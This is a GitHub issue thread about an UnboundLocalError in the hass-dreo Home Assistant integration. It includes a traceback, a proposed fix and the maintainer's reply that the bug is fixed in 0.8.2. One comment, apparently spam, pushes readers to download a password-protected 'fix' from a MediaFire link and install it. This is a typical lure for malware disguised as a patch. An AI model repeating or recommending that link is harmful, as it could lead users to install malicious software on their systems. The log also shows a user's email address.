### ISSUE TITLE
UnboundLocalError in parse_preset_modes function when setting up entry

### ISSUE THREAD

**Issue by holstein13** [JeffSteinbok/hass-dreo#168]
I’m encountering an error when setting up the dreo integration in Home Assistant. The error appears to be related to the handling of preset modes in the parse_preset_modes function within the pydreofan.py file.

Home Assistant Version: 2024.8.3
Dreo Custom Component Version:  0.8.1
Home Assistant Yellow

Logger: homeassistant.config_entries
Source: config_entries.py:604
First occurred: 10:10:39 PM (4 occurrences)
Last logged: 10:13:09 PM

Error setting up entry paul@paulholstein.com for dreo
Traceback (most recent call last):
  File "/usr/src/homeassistant/homeassistant/config_entries.py", line 604, in async_setup
    result = await component.async_setup_entry(hass, self)
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/config/custom_components/dreo/__init__.py", line 47, in async_setup_entry
    load_devices = await hass.async_add_executor_job(manager.load_devices)
                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.12/concurrent/futures/thread.py", line 58, in run
    result = self.fn(*self.args, **self.kwargs)
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/config/custom_components/dreo/pydreo/__init__.py", line 213, in load_devices
    proc_return = self._process_devices(device_list)
                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/config/custom_components/dreo/pydreo/__init__.py", line 170, in _process_devices
    device = PyDreoFan(SUPPORTED_FANS[model_prefix], dev, self)
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/config/custom_components/dreo/pydreo/pydreofan.py", line 55, in __init__
    self._preset_modes = self.parse_preset_modes(details)
                         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/config/custom_components/dreo/pydreo/pydreofan.py", line 118, in parse_preset_modes
    if (text, value) not in preset_modes:
                            ^^^^^^^^^^^^
UnboundLocalError: cannot access local variable 'preset_modes' where it is not associated with a value

Steps to Reproduce:

	1.	Install the dreo custom component in Home Assistant.
	2.	Attempt to set up the integration using my account.
	3.	The error occurs during the setup process.

Expected Behavior:
The integration should set up successfully without errors.

Actual Behavior:
The setup process fails with an UnboundLocalError related to the preset_modes variable in the parse_preset_modes function.

Possible Cause:
It appears that the preset_modes variable is being used before it is initialized. This could be due to conditional initialization not covering all code paths.

Proposed Solution:
Ensure that preset_modes are properly initialized before being used in the parse_preset_modes function. For example, initializing it as an empty list at the start of the function could prevent this error.

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by JeffSteinbok** [comment]
Fixed in 0.8.2
But question, which device was throwing this?  What model number?
Can you send me the HA diagnostic logs?

**Comment by holstein13** [comment]
I believe it was the Chefmaker, DR-KCM001S.  I posted the logs on issue #169 

I was under the impression that the Chefmaker was included on this release.
